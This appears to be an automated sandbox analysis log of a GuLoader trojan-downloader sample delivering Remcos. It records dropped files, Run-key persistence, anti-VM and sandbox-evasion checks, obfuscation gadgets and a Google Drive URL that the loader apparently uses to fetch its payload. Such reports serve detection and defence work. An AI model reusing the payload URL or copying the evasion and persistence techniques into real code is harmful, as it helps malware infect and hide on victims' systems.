Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 25_2_00403640
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 26_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 26_2_00403640
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe File created: C:\Users\user\AppData\Roaming\ios.exe Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe File created: C:\Users\user\AppData\Local\Temp\nsx9F89.tmp Jump to behavior
Source: classification engine Classification label: mal96.troj.spyw.evad.winEXE@14/18@3/3
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_004021AA CoCreateInstance, 0_2_004021AA
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_00404AB5
Source: C:\Users\user\AppData\Roaming\ios.exe Mutant created: \Sessions\1\BaseNamedObjects\Remcos-V27VY7
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3488:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3488:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8688
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"
Source: Window Recorder Window detected: More than 3 window changes detected
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: DIFXAPI.pdb source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr
Source: Binary string: D:\corp\project\swnr\portaudio\build\msvc\x64\Release\portaudio_x64.pdb++ source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, portaudio_x64.dll.0.dr
Source: Binary string: D:\corp\project\swnr\portaudio\build\msvc\x64\Release\portaudio_x64.pdb source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, portaudio_x64.dll.0.dr
Source: Binary string: mshtml.pdb source: ios.exe, 0000001F.00000001.1820605446.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source: Binary string: DIFXAPI.pdbH source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr
Source: Binary string: mshtml.pdbUGP source: ios.exe, 0000001F.00000001.1820605446.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source: Binary string: d:\build\ob\bora-18379147\bora-vmsoft\build\release-x64\svga\wddm\src\devapi\Win8Release\x64\bin\vm3ddevapi64-release.pdb source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, vm3ddevapi64-release.dll.0.dr

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000008.00000000.1148737503.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.1817719912.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2477891095.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1322446423.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1326110798.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_6F7C30C0 push eax; ret 0_2_6F7C30EE
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C8317 push FFFFFFD5h; iretd 0_2_032C8319
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C3C7A push ebx; ret 0_2_032C3C89
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01661966 push ebx; ret 8_2_01661975
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01666003 push FFFFFFD5h; iretd 8_2_01666005
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_70FD30C0 push eax; ret 25_2_70FD30EE
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F8317 push FFFFFFD5h; iretd 25_2_032F8319
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F3C7A push ebx; ret 25_2_032F3C89
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 26_2_70FC30C0 push eax; ret 26_2_70FC30EE
PE file contains sections with non-standard names
Source: vm3ddevapi64-release.dll.0.dr Static PE information: section name: .didat
Source: vm3ddevapi64-release.dll.0.dr Static PE information: section name: .gehcont
Source: vm3ddevapi64-release.dll.0.dr Static PE information: section name: _RDATA
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_6F7C1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_6F7C1BFF
Drops PE files
Source: C:\Users\user\AppData\Roaming\ios.exe File created: C:\Users\user\AppData\Local\Temp\nsqE5D6.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe File created: C:\Users\user\AppData\Local\Temp\nssA056.tmp\System.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\ios.exe File created: C:\Users\user\AppData\Local\Temp\nsdAA93.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe File created: C:\Users\user\AppData\Local\Temp\vm3ddevapi64-release.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe File created: C:\Users\user\AppData\Roaming\ios.exe Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe File created: C:\Users\user\AppData\Local\Temp\DiFxAPI.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe File created: C:\Users\user\AppData\Local\Temp\portaudio_x64.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ahw Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ahw Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect Any.run
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1326362275.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2478101501.00000000033F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSHTML.DLL
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1326362275.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1324049324.0000000001B31000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2478101501.00000000033F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1324049324.0000000001B31000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=16-ZMAFJETZH9DABQOP0U2ZSQ7P2C4WZM
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Roaming\ios.exe TID: 8640 Thread sleep count: 241 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe TID: 1960 Thread sleep count: 514 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe TID: 1960 Thread sleep time: -257000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\ios.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\ios.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vm3ddevapi64-release.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DiFxAPI.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\portaudio_x64.dll Jump to dropped file
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C7960 rdtsc 0_2_032C7960
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Roaming\ios.exe Window / User API: threadDelayed 514 Jump to behavior
Contains functionality to enumerate device drivers
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: K32EnumDeviceDrivers, 0_2_032D4010
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405D74
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_0040699E FindFirstFileW,FindClose, 0_2_0040699E
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 25_2_00405D74
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_0040290B FindFirstFileW, 25_2_0040290B
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_0040699E FindFirstFileW,FindClose, 25_2_0040699E
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 26_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 26_2_00405D74
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 26_2_0040290B FindFirstFileW, 26_2_0040290B
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 26_2_0040699E FindFirstFileW,FindClose, 26_2_0040699E
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\ios.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\ios.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\ios.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\ios.exe API call chain: ExitProcess graph end node
Source: vm3ddevapi64-release.dll.0.dr Binary or memory string: CompanyNameVMware, Inc.j!
Source: vm3ddevapi64-release.dll.0.dr Binary or memory string: http://www.vmware.com/0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1326864839.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2478654815.0000000004F49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: vm3ddevapi64-release.dll.0.dr Binary or memory string: VMware, Inc.
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1326864839.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2478654815.0000000004F49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: vm3ddevapi64-release.dll.0.dr Binary or memory string: VMware, Inc.1!0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1326864839.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2478654815.0000000004F49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: vm3ddevapi64-release.dll.0.dr Binary or memory string: http://www.vmware.com/0/
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1323318940.0000000001996000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1322818122.0000000001938000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5717770580.0000000001836000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5715131284.0000000001788000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2412474215.0000000001836000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2413097701.0000000001836000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: vm3ddevapi64-release.dll.0.dr Binary or memory string: VMware, Inc.1
Source: vm3ddevapi64-release.dll.0.dr Binary or memory string: VMware, Inc.0
Source: vm3ddevapi64-release.dll.0.dr Binary or memory string: ProductNameVMware SVGA 3D`
Source: vm3ddevapi64-release.dll.0.dr Binary or memory string: ?dbghelp.dllSoftware\VMware, Inc.\VMware SVGADebugSearchPathBacktrace[%2d] rip=%p %s+%#x %s:%d
